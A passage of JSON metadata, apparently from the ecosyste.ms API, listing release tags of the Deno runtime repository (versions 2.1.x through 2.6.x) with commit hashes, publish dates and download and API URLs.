land%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f